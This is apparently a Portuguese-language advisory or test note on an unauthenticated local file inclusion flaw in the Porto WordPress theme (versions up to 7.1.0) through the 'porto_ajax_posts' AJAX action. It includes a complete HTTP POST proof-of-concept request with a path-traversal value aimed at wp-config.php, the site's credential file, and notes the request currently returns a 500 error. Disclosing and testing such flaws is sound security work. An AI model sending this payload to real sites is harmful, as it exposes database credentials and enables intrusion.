
Porto <= 7.1.0 - Inclusão de Arquivo Local Não Autenticada via porto_ajax_posts
Porto <= 7.1.0 - Inclusão de Arquivo Local Não Autenticada via porto_ajax_posts
O tema Porto para WordPress é vulnerável à Inclusão de Arquivo Local em todas as versões até, e incluindo, 7.1.0 através da função 'porto_ajax_posts'. Isso possibilita que atacantes não autenticados incluam e executem arquivos arbitrários no servidor, permitindo a execução de qualquer código PHP nesses arquivos. Isso pode ser usado para bypassar controles de acesso, obter dados sensíveis ou alcançar execução de código em casos onde arquivos do tipo php podem ser enviados e incluídos.
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal
Content-Type: application/x-www-form-urlencoded
Content-Length: 116
action=porto_ajax_posts&post_type=post&extra={"shortcode":"porto_posts_grid","template":"../../../../wp-config.php"}
No momento, está retornando um erro 500.